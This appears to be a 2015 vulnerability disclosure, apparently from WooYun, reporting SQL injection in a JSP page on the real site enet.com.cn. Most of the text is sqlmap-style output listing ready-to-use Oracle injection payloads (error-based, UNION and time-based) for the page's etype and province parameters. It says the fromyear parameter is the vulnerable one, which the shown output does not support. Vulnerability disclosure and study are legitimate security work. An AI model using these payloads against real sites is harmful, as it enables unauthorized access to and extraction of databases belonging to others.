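2015-07-30: Details reported to the vendor; awaiting vendor handling
2015-08-04: The vendor actively ignored the vulnerability; details disclosed to the public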
Time-based blind SQL injection on a 硅谷动力 (enet.com.cn) page
http://www.enet.com.cn/enews/inforcenter/itdate/fitdate.jsp?province=&etype=&fromyear=200
The fromyear= parameter here has a time-based blind injection. Output from running it:
Place: POST
Parameter: etype
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: province=&etype=' AND 8797=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(97)||CHR(105)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (8797=8797) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND 'HPbf'='HPbf&fromyear=200

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: province=&etype=' UNION ALL SELECT NULL,NULL,NULL,CHR(58)||CHR(97)||CHR(105)||CHR(121)||CHR(58)||CHR(66)||CHR(72)||CHR(83)||CHR(72)||CHR(101)||CHR(97)||CHR(77)||CHR(121)||CHR(115)||CHR(110)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58),NULL FROM DUAL-- &fromyear=200

    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: province=&etype=-2167' OR 9487=DBMS_PIPE.RECEIVE_MESSAGE(CHR(67)||CHR(102)||CHR(115)||CHR(75),5) AND 'Nlvw'='Nlvw&fromyear=200

Place: POST
Parameter: province
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: province=' AND 7837=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(97)||CHR(105)||CHR(121)||CHR(58)||(SELECT (CASE WHEN (7837=7837) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58)||CHR(62))) FROM DUAL) AND 'SlMJ'='SlMJ&etype=&fromyear=200

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: province=' UNION ALL SELECT NULL,NULL,NULL,CHR(58)||CHR(97)||CHR(105)||CHR(121)||CHR(58)||CHR(89)||CHR(99)||CHR(82)||CHR(105)||CHR(108)||CHR(69)||CHR(113)||CHR(119)||CHR(84)||CHR(103)||CHR(58)||CHR(102)||CHR(108)||CHR(108)||CHR(58),NULL FROM DUAL-- &etype=&fromyear=200

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: province=' AND 2030=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(65)||CHR(68)||CHR(67),5) AND 'DZsv'='DZsv&etype=&fromyear=200
Severity: No impact (ignored by vendor)
Ignored at: 2015-08-04 19:32
Vulnerability Rank: 4 (WooYun rating)
None yet